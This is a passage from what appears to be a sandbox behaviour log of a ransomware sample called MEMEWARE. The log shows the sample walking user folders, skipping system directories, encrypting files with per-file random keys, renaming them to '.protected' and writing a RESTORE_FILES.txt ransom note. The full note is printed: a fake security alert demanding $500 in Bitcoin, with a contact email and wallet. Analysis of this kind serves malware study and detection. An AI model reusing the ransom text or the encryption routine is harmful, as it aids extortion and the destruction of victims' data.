liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.431] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.431] CloseHandle (hObject=0xb4) returned 1 [0095.431] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.protected") returned 51 [0095.431] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini" (normalized: 
"c:\\users\\default\\pictures\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Pictures\\desktop.ini.protected" (normalized: "c:\\users\\default\\pictures\\desktop.ini.protected")) returned 1 [0095.432] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.432] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.432] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Pictures\\RESTORE_FILES.txt") returned 47 [0095.432] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Pictures\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\pictures\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.432] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.432] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.433] lstrlenA (lpString="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") returned 684 [0095.433] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.433] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.433] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.433] CloseHandle (hObject=0xa4) returned 1 [0095.433] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Windows") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="Program Files (x86)") returned -1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="$Recycle.bin") returned 1 [0095.433] lstrcmpiW (lpString1="PrintHood", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood") returned 30 [0095.434] lstrcmpW (lpString1="PrintHood", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="PrintHood", lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\PrintHood\\*") returned 32 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\PrintHood\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.434] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Windows") returned -1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Program Files") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="Program Files (x86)") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="$Recycle.bin") returned 1 [0095.434] lstrcmpiW (lpString1="Recent", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent") returned 27 [0095.434] lstrcmpW (lpString1="Recent", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="Recent", 
lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Recent\\*") returned 29 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Recent\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0xffffffff [0095.434] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Windows") returned -1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="Program Files (x86)") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="$Recycle.bin") returned 1 [0095.434] lstrcmpiW (lpString1="Saved Games", lpString2="System Volume Information") returned -1 [0095.434] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games") returned 32 [0095.434] lstrcmpW (lpString1="Saved Games", lpString2=".") returned 1 [0095.434] lstrcmpW (lpString1="Saved Games", lpString2="..") returned 1 [0095.434] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\*") returned 34 [0095.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.435] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: 
pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\.") returned 34 [0095.435] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.435] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\." (normalized: "c:\\users\\default\\saved games\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.435] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\..") returned 35 [0095.435] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.435] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.435] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.435] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, 
Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\.." (normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.435] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.435] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.435] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.435] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.435] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.435] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.436] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.436] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" (normalized: "c:\\users\\default\\saved games\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved 
Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.436] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini") returned 44 [0095.436] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.436] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffee6, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x11a, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x11a, lpOverlapped=0x0) returned 1 [0095.437] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.437] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.437] CloseHandle (hObject=0xb4) returned 1 [0095.437] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.protected") returned 54 [0095.437] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini" 
(normalized: "c:\\users\\default\\saved games\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\desktop.ini.protected" (normalized: "c:\\users\\default\\saved games\\desktop.ini.protected")) returned 1 [0095.438] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0 [0095.438] FindClose (in: hFindFile=0x47b990 | out: hFindFile=0x47b990) returned 1 [0095.438] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Saved Games\\RESTORE_FILES.txt") returned 50 [0095.438] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Saved Games\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\saved games\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa4 [0095.438] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0095.438] WriteFile (in: hFile=0xa4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295f174*=0x53d, lpOverlapped=0x0) returned 1 [0095.439] lstrlenA (lpString="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") returned 684 [0095.439] WriteFile (in: hFile=0xa4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295f174*=0x2ac, lpOverlapped=0x0) returned 1 [0095.439] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0095.439] WriteFile (in: hFile=0xa4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295f174*=0xb1, 
lpOverlapped=0x0) returned 1 [0095.439] CloseHandle (hObject=0xa4) returned 1 [0095.439] FindNextFileW (in: hFindFile=0x47b950, lpFindFileData=0x295f400 | out: lpFindFileData=0x295f400) returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Windows") returned -1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Program Files") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="Program Files (x86)") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="$Recycle.bin") returned 1 [0095.439] lstrcmpiW (lpString1="Searches", lpString2="System Volume Information") returned -1 [0095.439] wnsprintfW (in: pszDest=0x4adad8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches") returned 29 [0095.439] lstrcmpW (lpString1="Searches", lpString2=".") returned 1 [0095.439] lstrcmpW (lpString1="Searches", lpString2="..") returned 1 [0095.439] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\*") returned 31 [0095.439] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\*", lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 0x47b990 [0095.440] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0095.440] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0095.440] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\.") returned 31 [0095.441] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0095.441] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, 
dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\." (normalized: "c:\\users\\default\\searches\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.441] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\..") returned 32 [0095.441] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0095.441] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0095.441] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\.." 
(normalized: "c:\\users\\default"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.441] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Windows") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="Program Files (x86)") returned -1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="$Recycle.bin") returned 1 [0095.441] lstrcmpiW (lpString1="desktop.ini", lpString2="System Volume Information") returned -1 [0095.441] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.441] StrStrIW (lpFirst="desktop.ini", lpSrch=".protected") returned 0x0 [0095.441] lstrcmpW (lpString1="desktop.ini", lpString2="RESTORE_FILES.txt") returned -1 [0095.441] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.441] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.441] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW (lpFirst="desktop.ini", lpSrch=".txt") returned 0x0 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW 
(lpFirst="desktop.ini", lpSrch=".rar") returned 0x0 [0095.442] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini") returned 41 [0095.442] StrStrW (lpFirst="desktop.ini", lpSrch=".zip") returned 0x0 [0095.442] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0095.443] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xfffffdf4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x20c, lpOverlapped=0x0) returned 1 [0095.443] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0095.443] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0095.443] CloseHandle (hObject=0xb4) returned 1 [0095.443] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.protected") returned 51 [0095.443] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini" (normalized: "c:\\users\\default\\searches\\desktop.ini"), lpNewFileName="\\\\?\\C:\\Users\\Default\\Searches\\desktop.ini.protected" (normalized: "c:\\users\\default\\searches\\desktop.ini.protected")) returned 1 [0095.444] 
FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Windows") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="Program Files (x86)") returned -1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="$Recycle.bin") returned 1 [0095.444] lstrcmpiW (lpString1="Everywhere.search-ms", lpString2="System Volume Information") returned -1 [0095.444] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms") returned 50 [0095.444] StrStrIW (lpFirst="Everywhere.search-ms", lpSrch=".protected") returned 0x0 [0095.444] lstrcmpW (lpString1="Everywhere.search-ms", lpString2="RESTORE_FILES.txt") returned -1 [0095.444] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0095.444] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0095.444] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\Searches\\Everywhere.search-ms" (normalized: "c:\\users\\default\\searches\\everywhere.search-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0095.444] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0095.444] lstrcmpiW (lpString1="Indexed Locations.search-ms", lpString2="Windows") returned -1 [0095.444] 